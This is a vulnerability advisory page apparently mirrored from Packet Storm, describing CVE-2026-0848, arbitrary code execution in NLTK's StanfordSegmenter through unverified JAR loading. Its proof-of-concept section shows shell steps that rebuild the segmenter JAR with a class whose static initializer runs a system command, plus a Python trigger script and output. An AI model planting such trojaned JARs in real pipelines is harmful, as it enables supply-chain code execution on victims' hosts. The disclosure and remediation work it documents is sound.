Lucene search
K

📄 NLTK StanfordSegmenter 3.9.2 Arbitrary Code Execution

🗓️ 31 Mar 2026 00:00:00Reported by Sarvesh PatilType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 105 Views

NLTK StanfordSegmenter loads external Java jars without verification, enabling supply-chain remote code execution.

Related
Code
# CVE-2026-0848 — NLTK StanfordSegmenter: Arbitrary Code Execution via Untrusted JAR Loading
    
    <p align="center">
      <img src="https://img.shields.io/badge/CVE-2026--0848-critical?style=for-the-badge&color=8B0000" />
      <img src="https://img.shields.io/badge/Severity-Critical%20(CVSS%2010.0)-red?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Affected-NLTK%20%3C%3D%203.9.2-yellow?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Type-CWE--20%20Improper%20Input%20Validation-blue?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Fix-Merged%20(PR%20%233522)-brightgreen?style=for-the-badge" />
    </p>
    
    ---
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | CVE-2026-0848 |
    | **Package** | `nltk` (Natural Language Toolkit) |
    | **Registry** | PyPI |
    | **Affected Versions** | `<= 3.9.2` |
    | **Vulnerability Type** | CWE-20: Improper Input Validation |
    | **CVSS Score** | 10.0 (Critical) |
    | **Attack Vector** | Network |
    | **Attack Complexity** | Low |
    | **Privileges Required** | None |
    | **User Interaction** | None |
    | **Scope** | Changed |
    | **Confidentiality Impact** | High |
    | **Integrity Impact** | High |
    | **Availability Impact** | High |
    | **Reported On** | December 6, 2025 |
    | **CVE Published** | March 2026 |
    | **Supported By** | Palo Alto Networks / Prisma AIRS |
    
    ---
    
    ## Description
    
    `nltk.tokenize.StanfordSegmenter` dynamically loads external Java `.jar` files via `subprocess` without performing any integrity verification, signature checking, or sandboxing. The class accepts fully attacker-controlled parameters including `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class`, and passes them directly to a `java -cp` invocation.
    
    If an attacker can supply or replace the JAR file — through a poisoned model download, a man-in-the-middle package swap, dependency poisoning, or a corrupted release mirror — arbitrary Java bytecode executes at class-load time via the JVM's static initializer mechanism. This constitutes a **supply-chain Remote Code Execution** vulnerability and fully escapes the Python runtime.
    
    ---
    
    ## Affected Components
    
    | File | Lines | Description |
    |---|---|---|
    | `nltk/tokenize/stanford_segmenter.py` | L53–L118 | Accepts attacker-controlled `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` with no validation |
    | `nltk/internals.py` | L220–L300 | Launches Java execution directly with user-controlled JAR path and classpath, no sandboxing or checksum verification |
    | `nltk/internals.py` | L109–L152 | `subprocess.Popen()` executes Java with unvalidated classpath input, allowing the JVM to load arbitrary bytecode and run static initializers |
    
    ---
    
    ## CVSS Vector
    
    ```
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    ```
    
    | Metric | Value |
    |---|---|
    | Attack Vector | Network |
    | Attack Complexity | Low |
    | Privileges Required | None |
    | User Interaction | None |
    | Scope | Changed |
    | Confidentiality | High |
    | Integrity | High |
    | Availability | High |
    
    ---
    
    ## Impact
    
    Successful exploitation grants an attacker **full control over the system** running the NLTK segmentation process:
    
    - **Arbitrary Java code execution** — Any bytecode embedded in the malicious JAR runs with the privileges of the Python/Java process
    - **Python runtime escape** — Execution moves into the JVM, bypassing Python-level sandboxing entirely
    - **OS-level command execution** — Attackers can invoke `Runtime.getRuntime().exec()` or `ProcessBuilder` to run arbitrary shell commands
    - **Data theft and modification** — Access to all files, environment variables, API keys, and secrets readable by the process
    - **Full environment compromise** — In CI/CD, production NLP pipelines, or server environments, a single malicious JAR leads to complete host takeover
    
    ### High-Risk Deployment Scenarios
    
    | Scenario | Impact |
    |---|---|
    | ML researcher loads a pretrained segmenter from the internet | Remote attacker gains code execution |
    | Organization downloads a corrupted Chinese segmentation model ZIP | Malware executes inside production NLP pipeline |
    | CI/CD server installs model via `wget`/`unzip` from a non-HTTPS mirror | Full environment compromise |
    | Dependency takeover or poisoned release mirror | Complete supply-chain RCE |
    
    This vulnerability affects any NLP workflow using `StanfordSegmenter`, including chatbots, LLM preprocessing pipelines, dataset segmentation, document classification, and production inference services.
    
    ---
    
    ## Proof of Concept
    
    > **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.**
    
    ### Step 1 — Replace Core Classifier with Malicious Java Class
    
    ```bash
    cd stanford-segmenter-2020-11-17/merged
    jar xf ../stanford-segmenter-4.2.0.jar
    rm -rf edu/stanford/nlp/ie/crf/CRFClassifier.class
    
    cat << 'EOF' > edu/stanford/nlp/ie/crf/CRFClassifier.java
    package edu.stanford.nlp.ie.crf;
    
    public class CRFClassifier {
        static {
            try {
                System.out.println("\nPayload executed — Code ran on class load!\n");
                Runtime.getRuntime().exec("touch /tmp/pwned_hijack");
            } catch(Exception e){}
        }
        public static void main(String[] args){}
    }
    EOF
    
    javac edu/stanford/nlp/ie/crf/CRFClassifier.java
    jar cfm exploit.jar META-INF/MANIFEST.MF *
    cp exploit.jar ../stanford-segmenter.jar
    ```
    
    ### Step 2 — Build the Malicious JAR
    
    ```bash
    mkdir merged && cd merged
    javac Payload.java
    jar xf ../stanford-segmenter-4.2.0.jar
    jar xf ../stanford-corenlp-4.2.0/stanford-corenlp-4.2.0.jar
    jar cfm exploit.jar META-INF/MANIFEST.MF *
    jar uf exploit.jar Payload.class
    cp exploit.jar ../stanford-segmenter.jar
    cd ..
    ```
    
    ### Step 3 — Trigger via NLTK
    
    ```python
    # test.py
    from nltk.tokenize.stanford_segmenter import StanfordSegmenter
    
    print("[+] Triggering payload via modified Stanford JAR...")
    
    seg = StanfordSegmenter(
        path_to_jar="stanford-segmenter.jar",
        path_to_sihan_corpora_dict="./data/",
        path_to_dict="./data/dict-chris6.ser.gz",
        path_to_model="./data/pku.gz",
        java_class="edu.stanford.nlp.ie.crf.CRFClassifier",
        encoding="utf-8"
    )
    
    print("[+] Running segmentation...")
    print(seg.segment("我爱自然语言处理"))
    ```
    
    **Output:**
    
    ```
    [+] Triggering payload via modified Stanford JAR...
    
    Payload executed — Code ran on class load!
    
    [+] Running segmentation...
    我 爱 自然语言 处理
    ```
    
    **Confirm RCE:**
    
    ```bash
    ls /tmp | grep pwned_hijack
    # pwned_hijack
    ```
    
    ---
    
    ## Root Cause
    
    The vulnerability exists across two files:
    
    **`stanford_segmenter.py`** — The `StanfordSegmenter` class constructor accepts `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` as plain string arguments and forwards them directly to the Java execution layer without performing any of the following:
    
    - Path allowlist or trusted-directory enforcement
    - SHA-256 or cryptographic signature verification of the JAR
    - Validation of the `java_class` parameter against a known-safe set of class names
    
    **`internals.py`** — The `java()` helper constructs and launches a `subprocess.Popen()` call with the user-supplied classpath. The JVM immediately loads all classes in the provided JAR, executing any static initializer blocks before the application logic runs. There is no sandbox, no integrity gate, and no mechanism to prevent execution of injected bytecode.
    
    ---
    
    ## Fix
    
    The vulnerability has been fully resolved in the upstream NLTK repository.
    
    | Resource | Link |
    |---|---|
    | **Central Security Fix (all CVEs)** | [https://github.com/nltk/nltk/pull/3522](https://github.com/nltk/nltk/pull/3522) |
    | Researcher's initial fix PR | https://github.com/nltk/nltk/pull/3477 (merged) |
    
    Upgrade to a patched version of NLTK as soon as it is available on PyPI.
    
    ---
    
    ## Remediation
    
    | Action | Details |
    |---|---|
    | **Upgrade NLTK** | Update to a version greater than 3.9.2 containing the fix from PR #3522 |
    | **Do Not Use User-Controlled JAR Paths** | Never allow user input to influence `path_to_jar`, `path_to_model`, or `java_class` arguments |
    | **Verify JAR Integrity** | Always verify SHA-256 checksums of downloaded JAR files against official published hashes before use |
    | **Use HTTPS Sources Only** | Download model files and JARs exclusively from official HTTPS sources; reject any HTTP or unverified mirror |
    | **Least Privilege** | Run NLTK-based services under a restricted OS user with minimal filesystem and network permissions |
    | **Containerization** | Isolate NLP services in Docker containers or similar sandboxes to limit the blast radius of JAR-based exploits |
    | **Dependency Monitoring** | Use a software composition analysis tool to detect tampered or replaced JAR dependencies in CI/CD pipelines |
    
    **Upgrade via pip:**
    
    ```bash
    pip install --upgrade nltk
    ```
    
    **Verify installed version:**
    
    ```bash
    python -c "import nltk; print(nltk.__version__)"
    ```
    
    ---
    
    ## Timeline
    
    | Date | Event |
    |---|---|
    | December 6, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 (Sarvesh Patil) |
    | December 2025 | NLTK maintainer team notified via huntr.dev |
    | January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded |
    | January 2026 | CVE-2026-0848 assigned |
    | January 2026 | Researcher's fix PR #3477 submitted and merged |
    | February 2026 | 48-hour pre-publication warning sent to NLTK maintainers |
    | March 2026 | CVE published on NVD and huntr.dev |
    | March 2026 | Central security fix for all CVEs merged via PR #3522 |
    
    ---
    
    ## References
    
    | Resource | Link |
    |---|---|
    | NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0848 |
    | Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0848 |
    | huntr.dev Report | https://huntr.dev |
    | Central Fix PR | https://github.com/nltk/nltk/pull/3522 |
    | Researcher Fix PR | https://github.com/nltk/nltk/pull/3477 |
    | NLTK on PyPI | https://pypi.org/project/nltk/ |
    | Stanford Word Segmenter | https://nlp.stanford.edu/software/segmenter.html |
    | OWASP — Arbitrary Code Execution | https://owasp.org/www-community/attacks/Code_Injection |
    | OWASP — Untrusted Search Path | https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection |
    | CWE-20: Improper Input Validation | https://cwe.mitre.org/data/definitions/20.html |
    | CWE-502: Deserialization of Untrusted Data | https://cwe.mitre.org/data/definitions/502.html |
    
    ---
    
    ## Disclaimer
    
    This repository documents CVE-2026-0848 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability.
    
    Any use of this information to access or compromise systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein.
    
    Contributors: [ketanHub](https://github.com/ketanHub)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2026 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 310
EPSS0.00307
SSVC
105